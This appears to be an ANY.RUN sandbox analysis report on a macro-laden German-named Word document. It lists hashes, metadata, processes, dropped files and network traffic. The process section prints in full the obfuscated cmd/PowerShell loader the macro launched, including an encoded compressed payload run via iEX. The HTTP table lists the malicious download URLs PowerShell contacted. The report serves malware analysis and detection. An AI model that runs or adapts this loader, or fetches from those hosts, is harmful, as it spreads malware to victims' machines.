File name:

2018_11Details_zur_Transaktion.doc

Full analysis: https://app.any.run/tasks/4e6e12b9-7365-4618-9405-a037de955113
Verdict: Malicious activity
Analysis date: September 18, 2024, 19:06:00
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
generated-doc
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Penelope-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Nov 12 14:19:00 2018, Last Saved Time/Date: Mon Nov 12 14:19:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

5D0DD6D7035F30516E5514928C315DC1

SHA1:

3D5D1E2D45D8B20A74247E09238EC8AFA0281F0E

SHA256:

09EBE4229A74CDB1212671E6391742CC6BEE387BF14DA02974B07857B27F9223

SSDEEP:

1536:xAAvR+O5eNHI4eYAlf4rF3vgReZr9iGN:x6O5WilOFYG9B

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 6900)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Identification: Word 8.0
LanguageCode: English (US)
DocFlags: Has picture, 1Table, ExtChar
System: Windows
Word97: No
Title: -
Subject: -
Author: Penelope-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
Software: Microsoft Office Word
CreateDate: 2018:11:12 14:19:00
ModifyDate: 2018:11:12 14:19:00
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
LastPrinted: 0000:00:00 00:00:00
RevisionNumber: 1
TotalEditTime: -
Words: 2
Characters: 13
Pages: 1
Paragraphs: 1
Lines: 1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
143
Monitored processes
9
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe ai.exe no specs sppextcomobj.exe no specs slui.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1116POWErshelL .('SV' ) (\"{1}{0}\" -f'6Z','Wo' ) ( [TYPe]( \"{0}{2}{3}{1}\"-F 'ENvi','Nt','R','onme' ) ) ; ( ( &( \"{0}{3}{1}{2}\"-f'G','ri','aBlE','eT-VA' ) ( \"{1}{0}\"-f'Z','WO6' ) ).\"V`ALUe\"::(\"{4}{1}{5}{6}{0}{3}{2}\" -f'NT','EN','aRiABlE','v','gET','vI','roNmE' ).Invoke( ( \"{0}{1}\" -f'b','GuF'),( \"{0}{1}{2}\" -f'pR','OCeS','S') ) ) | . ( ( & ( \"{1}{0}{2}\"-f'eT-vari','G','ABlE' ) ( \"{1}{0}\" -f 'R*','*md') ).\"NA`ME\"[3,11,2]-join'' )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1164"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exe" "E26AA48B-1F0C-415A-A698-CA4F1D360934" "F3319CAE-6B08-44F9-85F8-3D9F6CBCEF9D" "5060"C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ai.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Artificial Intelligence (AI) Host for the Microsoft® Windows® Operating System and Platform x64.
Version:
0.12.2.0
Modules
Images
c:\program files\microsoft office\root\vfs\programfilescommonx64\microsoft shared\office16\ai.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
3648C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
5060"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n C:\Users\admin\AppData\Local\Temp\2018_11Details_zur_Transaktion.doc /o ""C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\winword.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
6360"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6600C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6900CMD /c c:\wINDoWs\SystEM32\cMD.EXe /c "seT BGuF=SEt ('C3'+'Iv') ( " ) )93]RahC[,63]RahC[F-)' ) (dnEoT'+'Dae'+'r.'+'))iI'+'cS'+'a:'+':]gN'+'Id'+'o'+'CNE.tX'+'Et[ ,'+' )'+')S'+'seRP'+'MO'+'ceD'+'::]'+'eDOM'+'noISSErpmOC.N'+'OI'+'SSERPMoC.o'+'I[,'+')'+' }'+'1'+'{==g'+'A'+'4F/'+'wb'+'W'+'GNM'+'XnS'+'2V'+'ta'+'n4'+'Z'+'j8'+'G'+'Oh+adO'+'ry+'+'FJdz'+'O4gV1'+'8vu'+'1I'+'iPvD5r1H'+'8fVD0fmdbCD'+'L53qsrX'+'b'+'d'+'KgvW76A4vAg4'+'ju'+'PfAPGc'+'h'+'w'+'TY'+'ZgU'+'v'+'M'+'JWuu'+'zo3'+'HONT+if'+'Y'+'8K'+'vne'+'MqrR'+'AW'+'46oW'+'I'+'w4ugeo'+'SKmg'+'Hw'+'ty'+'9z+0ZOiUE'+'1EqL9uU94xvY'+'660wf'+'anZNgyM5SNMFz+u0mikeXMGF'+'X'+'R'+'7'+'S'+'rNM'+'w'+'fGC'+'yvD1bA1F'+'neBRd'+'aORoug'+'BzyokRCjo'+'b'+'U'+'uLN'+'b'+'bxkEQre'+'yaJ'+'J'+'CAfU'+'S2'+'L'+'V'+'r'+'P'+'HClC'+'d5z6d'+'D'+'w98e/b'+'Rt9N+ra2z'+'Yd'+'pJzmV7J'+'2HjhAZMMa'+'SO2G'+'0'+'QE5lx'+'Tg'+'joE8j'+'S/'+'DIEwI8at'+'B'+'Z'+'N}1{(G'+'nIr'+'Ts46E'+'s'+'aBmorf:'+':]TrEvn'+'OC[ ]maE'+'r'+'tsyrome'+'M'+'.oi[(mae'+'RTSeTalfEd'+'.'+'N'+'oIs'+'S'+'e'+'RPMoC.OI '+' t'+'Cej'+'BO-we'+'n ((red'+'A'+'E'+'rmAeRt'+'S.oi'+'.M'+'eTS'+'Ys tCejBO-wen('+')}1{x}1{'+'+'+']'+'03['+'EmOHSP'+'}0'+'{+]'+'4['+'EMOh'+'S'+'p}0{ (.'+' '(( ()'x'+]31[DIlLEhS$+]1[Dillehs$ (^& " );iEX ( -jOIn ( gEt-VAriabLE ('c3'+'iv') ).vaLUE[- 1.. - ( ( gEt-VAriabLE ('c3'+'iv') ).vaLUE.LeNgTh )]) && POWErshelL .('SV' ) (\"{1}{0}\" -f'6Z','Wo' ) ( [TYPe]( \"{0}{2}{3}{1}\"-F 'ENvi','Nt','R','onme' ) ) ; ( ( ^&( \"{0}{3}{1}{2}\"-f'G','ri','aBlE','eT-VA' ) ( \"{1}{0}\"-f'Z','WO6' ) ).\"V`ALUe\"::(\"{4}{1}{5}{6}{0}{3}{2}\" -f'NT','EN','aRiABlE','v','gET','vI','roNmE' ).Invoke( ( \"{0}{1}\" -f'b','GuF'),( \"{0}{1}{2}\" -f'pR','OCeS','S') ) ) ^| . ( ( ^& ( \"{1}{0}{2}\"-f'eT-vari','G','ABlE' ) ( \"{1}{0}\" -f 'R*','*md') ).\"NA`ME\"[3,11,2]-join'' )" C:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6932\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6980c:\wINDoWs\SystEM32\cMD.EXe /c "seT BGuF=SEt ('C3'+'Iv') ( " ) )93]RahC[,63]RahC[F-)' ) (dnEoT'+'Dae'+'r.'+'))iI'+'cS'+'a:'+':]gN'+'Id'+'o'+'CNE.tX'+'Et[ ,'+' )'+')S'+'seRP'+'MO'+'ceD'+'::]'+'eDOM'+'noISSErpmOC.N'+'OI'+'SSERPMoC.o'+'I[,'+')'+' }'+'1'+'{==g'+'A'+'4F/'+'wb'+'W'+'GNM'+'XnS'+'2V'+'ta'+'n4'+'Z'+'j8'+'G'+'Oh+adO'+'ry+'+'FJdz'+'O4gV1'+'8vu'+'1I'+'iPvD5r1H'+'8fVD0fmdbCD'+'L53qsrX'+'b'+'d'+'KgvW76A4vAg4'+'ju'+'PfAPGc'+'h'+'w'+'TY'+'ZgU'+'v'+'M'+'JWuu'+'zo3'+'HONT+if'+'Y'+'8K'+'vne'+'MqrR'+'AW'+'46oW'+'I'+'w4ugeo'+'SKmg'+'Hw'+'ty'+'9z+0ZOiUE'+'1EqL9uU94xvY'+'660wf'+'anZNgyM5SNMFz+u0mikeXMGF'+'X'+'R'+'7'+'S'+'rNM'+'w'+'fGC'+'yvD1bA1F'+'neBRd'+'aORoug'+'BzyokRCjo'+'b'+'U'+'uLN'+'b'+'bxkEQre'+'yaJ'+'J'+'CAfU'+'S2'+'L'+'V'+'r'+'P'+'HClC'+'d5z6d'+'D'+'w98e/b'+'Rt9N+ra2z'+'Yd'+'pJzmV7J'+'2HjhAZMMa'+'SO2G'+'0'+'QE5lx'+'Tg'+'joE8j'+'S/'+'DIEwI8at'+'B'+'Z'+'N}1{(G'+'nIr'+'Ts46E'+'s'+'aBmorf:'+':]TrEvn'+'OC[ ]maE'+'r'+'tsyrome'+'M'+'.oi[(mae'+'RTSeTalfEd'+'.'+'N'+'oIs'+'S'+'e'+'RPMoC.OI '+' t'+'Cej'+'BO-we'+'n ((red'+'A'+'E'+'rmAeRt'+'S.oi'+'.M'+'eTS'+'Ys tCejBO-wen('+')}1{x}1{'+'+'+']'+'03['+'EmOHSP'+'}0'+'{+]'+'4['+'EMOh'+'S'+'p}0{ (.'+' '(( ()'x'+]31[DIlLEhS$+]1[Dillehs$ (& " );iEX ( -jOIn ( gEt-VAriabLE ('c3'+'iv') ).vaLUE[- 1.. - ( ( gEt-VAriabLE ('c3'+'iv') ).vaLUE.LeNgTh )]) && POWErshelL .('SV' ) (\"{1}{0}\" -f'6Z','Wo' ) ( [TYPe]( \"{0}{2}{3}{1}\"-F 'ENvi','Nt','R','onme' ) ) ; ( ( ^&( \"{0}{3}{1}{2}\"-f'G','ri','aBlE','eT-VA' ) ( \"{1}{0}\"-f'Z','WO6' ) ).\"V`ALUe\"::(\"{4}{1}{5}{6}{0}{3}{2}\" -f'NT','EN','aRiABlE','v','gET','vI','roNmE' ).Invoke( ( \"{0}{1}\" -f'b','GuF'),( \"{0}{1}{2}\" -f'pR','OCeS','S') ) ) ^| . ( ( ^& ( \"{1}{0}{2}\"-f'eT-vari','G','ABlE' ) ( \"{1}{0}\" -f 'R*','*md') ).\"NA`ME\"[3,11,2]-join'' )"C:\Windows\System32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
Total events
22 319
Read events
21 751
Write events
517
Delete events
51

Modification events

(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000B24E9A3E01000000000000000500000000000000
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete valueName:0
Value:
ซ괐殺ࠆꯞꝅ莼跳⏺䘅헉꾍樁င$梅摝麨…ީ湕湫睯쥮௅賙ᒳ೅肫
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5932
Operation:delete keyName:(default)
Value:
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\5060
Operation:writeName:0
Value:
0B0E1087C3DE37764B12439C38B48132DD982A230046E5DE9086DDBFC2ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C427D2120B770069006E0077006F00720064002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:de-de
Value:
2
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:fr-fr
Value:
2
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:es-es
Value:
2
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:it-it
Value:
2
(PID) Process:(5060) WINWORD.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:ja-jp
Value:
2
Executable files
27
Suspicious files
123
Text files
37
Unknown types
2

Dropped files

PID
Process
Filename
Type
1116powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e5ujq3kq.ndh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5060WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9binary
MD5:EFDDFCA91E055EC6671B31DA68EFD47C
SHA256:0323CEDE2CFFF219B7018B1C36C8BD516BA44145D88F80CB987C4785A93C6F7E
5060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4A6C5E3F-09D5-4DF8-AD17-CB30AA50815Axml
MD5:1EDED86802700AE31BFC43BBF8233D38
SHA256:7793FC02D1A9E36BEE00B3D5E515621BDFAF9A78FA7A5816B6569D12A101DE09
5060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbresbinary
MD5:969769EBDAC18846109F895D57677B0A
SHA256:B1F8A13B592AE97143FA66016D233B778D7A2ECFCE261C80399CE746EF82F74E
5060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:1965C25C37FB5AFF47704FFC021178EB
SHA256:CAD759D6C68126E1463909F17A4B82B6964314024174800734FC76C062CBA779
1116powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0m5rueom.fh1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5060WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$18_11Details_zur_Transaktion.docbinary
MD5:0C83BCC7286A0592A47F46E22D544330
SHA256:FD17942FFE7F1867EE3A34EBC816E3CCF9F8E54A9E209642E3F1088564425767
5060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntities.bintext
MD5:CC90D669144261B198DEAD45AA266572
SHA256:89C701EEFF939A44F28921FD85365ECD87041935DCD0FE0BAF04957DA12C9899
5060WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:0A9B0BAC0EFAE748D571ECF6E04B0009
SHA256:508890DDDBABCAD21CFAEE985C7970F13318BC6FA7CF83D4E25AE8F776668BFF
5060WINWORD.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9binary
MD5:DDC1E6368DEBA23C633D237F2564B717
SHA256:C9E8450DAFE9A6F87DBAE742658DDD8B7EC1B8DC591F23BDC3674422B2E04C47
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
18
TCP/UDP connections
111
DNS requests
37
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
32
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2120
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
2928
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5060
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
5060
WINWORD.EXE
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5336
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
1116
powershell.exe
GET
301
103.176.179.37:80
http://vinastone.com/57qt1
unknown
unknown
1116
powershell.exe
GET
302
50.28.39.135:80
http://montegrappa.com.pa/7
unknown
malicious
1116
powershell.exe
GET
200
50.28.39.135:80
http://montegrappa.com.pa/cgi-sys/suspendedpage.cgi
unknown
malicious
1116
powershell.exe
GET
301
216.37.42.32:80
http://timlinger.com/nmw
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3888
svchost.exe
239.255.255.250:1900
whitelisted
20.189.173.14:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
4
System
192.168.100.255:138
whitelisted
92.123.104.65:443
Akamai International B.V.
DE
unknown
5092
RUXIMICS.exe
52.183.220.149:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
52.183.220.149:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2120
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
32
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2120
MoUsoCoreWorker.exe
52.183.220.149:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
2928
svchost.exe
40.126.32.72:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 52.183.220.149
  • 51.104.136.2
  • 52.167.17.97
whitelisted
google.com
  • 142.250.185.174
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 88.221.169.152
whitelisted
login.live.com
  • 40.126.32.72
  • 20.190.160.14
  • 20.190.160.20
  • 40.126.32.74
  • 40.126.32.76
  • 40.126.32.133
  • 40.126.32.136
  • 40.126.32.134
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
officeclient.microsoft.com
  • 52.109.76.240
whitelisted
ecs.office.com
  • 52.113.194.132
whitelisted
roaming.officeapps.live.com
  • 52.109.28.47
whitelisted
omex.cdn.office.net
  • 2.19.126.160
  • 2.19.126.151
whitelisted
fs.microsoft.com
  • 184.28.90.27
whitelisted

Threats

No threats detected
Process
Message
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.
WINWORD.EXE
WebView2: Failed to find an installed WebView2 runtime or non-stable Microsoft Edge installation.